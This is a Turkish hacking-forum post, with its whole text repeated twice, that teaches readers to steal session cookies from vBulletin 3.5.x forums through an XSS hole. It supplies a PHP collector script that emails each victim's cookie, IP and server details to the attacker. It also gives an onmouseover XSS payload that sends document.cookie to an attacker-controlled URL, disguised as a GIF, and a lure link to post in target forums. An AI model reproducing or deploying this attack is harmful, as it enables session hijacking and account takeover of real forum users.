vBulletin 3.5.X Xss Acıgı Ile Cookıe Alma
vBulletin 3.5.X Xss Acıgı Ile Cookıe Alma [Yeni Acık]
Arkadaslar acık yenı bı acık ve maılınıze cookıelerı yolluyor yontem soyle;
(exploit.php) adında php dosya hazırlayıp ıcıne;
Code:
<?php
$ip_adresse = $_SERVER[\\'REMOTE_ADDR\\'];
if(!empty($ip_adresse))
{
echo \\'il tuo ip ?: \\',$ip_adresse;
}
else
{
echo \\'Impossible d\\\\\\'afficher l\\\\\\'IP\\';
}
?>
<a href=\\"log.php\\"></a><?
$xx1=$HTTP_SERVER_VARS[\\'SERVER_PORT\\'];
$day = date(\\"d\\",time()); $month = date(\\"m\\",time()); $year = date(\\"Y\\",time());
if ($REMOTE_HOST == \\"\\") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = \\'http://\\' . $HTTP_SERVER_VARS[\\'SERVER_NAME\\'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>
<?php
$cookie = $_GET[\\'c\\'];
?>
<?php
$myemail = \\"YOUR ADDRESS E-MAIL\\";
$today = date(\\"l, F j, Y, g:i a\\") ;
$subject = \\"Xss Vbulletin\\" ;
$message = \\"Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \\\\n
\\";
$from = \\"From: $myemail\\\\r\\\\n\\";
mail($myemail, $subject, $message, $from);
?>
Bunları koyup kaydedıyoruz ve hostumuza atıyoruz free de olur.
$myemail = \\"YOUR ADDRESS E-MAIL\\"; kodlarda bu kısma maıl adresımızı yazıyoruz..
Daha sonra bır notepad acıp ıcıne;
Code:
<pre a=\\'>\\' onmouseover=\\'********.********=\\"http://YOUR ADDRESS WEB.com/exploit.php?c=\\"+********.cookie\\' b=\\'</pre\\' >
bu kodları koyup gif olarak kaydedıyoruz edıtlenecek kısmı kendınıze gore edıtleyın..
Son olarak hedef foruma gıdıp uye olup konu acarken su mesaj kısmına sunu yazıyoruz
Code:
<a href=\\"http://YOUR ADDRESS WEB.com/IMAGE.GIF\\" target=\\"_blank\\">Tıklayınız</a> \\'
Gereklı yerlerı kendınıze gore edıtleyınız.
Umarım işinize yaramıştır.
vBulletin 3.5.X Xss Acıgı Ile Cookıe Alma [Yeni Acık]
Arkadaslar acık yenı bı acık ve maılınıze cookıelerı yolluyor yontem soyle;
(exploit.php) adında php dosya hazırlayıp ıcıne;
Code:
<?php
$ip_adresse = $_SERVER[\\'REMOTE_ADDR\\'];
if(!empty($ip_adresse))
{
echo \\'il tuo ip ?: \\',$ip_adresse;
}
else
{
echo \\'Impossible d\\\\\\'afficher l\\\\\\'IP\\';
}
?>
<a href=\\"log.php\\"></a><?
$xx1=$HTTP_SERVER_VARS[\\'SERVER_PORT\\'];
$day = date(\\"d\\",time()); $month = date(\\"m\\",time()); $year = date(\\"Y\\",time());
if ($REMOTE_HOST == \\"\\") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = \\'http://\\' . $HTTP_SERVER_VARS[\\'SERVER_NAME\\'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>
<?php
$cookie = $_GET[\\'c\\'];
?>
<?php
$myemail = \\"YOUR ADDRESS E-MAIL\\";
$today = date(\\"l, F j, Y, g:i a\\") ;
$subject = \\"Xss Vbulletin\\" ;
$message = \\"Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \\\\n
\\";
$from = \\"From: $myemail\\\\r\\\\n\\";
mail($myemail, $subject, $message, $from);
?>
Bunları koyup kaydedıyoruz ve hostumuza atıyoruz free de olur.
$myemail = \\"YOUR ADDRESS E-MAIL\\"; kodlarda bu kısma maıl adresımızı yazıyoruz..
Daha sonra bır notepad acıp ıcıne;
Code:
<pre a=\\'>\\' onmouseover=\\'********.********=\\"http://YOUR ADDRESS WEB.com/exploit.php?c=\\"+********.cookie\\' b=\\'</pre\\' >
bu kodları koyup gif olarak kaydedıyoruz edıtlenecek kısmı kendınıze gore edıtleyın..
Son olarak hedef foruma gıdıp uye olup konu acarken su mesaj kısmına sunu yazıyoruz
Code:
<a href=\\"http://YOUR ADDRESS WEB.com/IMAGE.GIF\\" target=\\"_blank\\">Tıklayınız</a> \\'
Gereklı yerlerı kendınıze gore edıtleyınız.
Umarım işinize yaramıştır.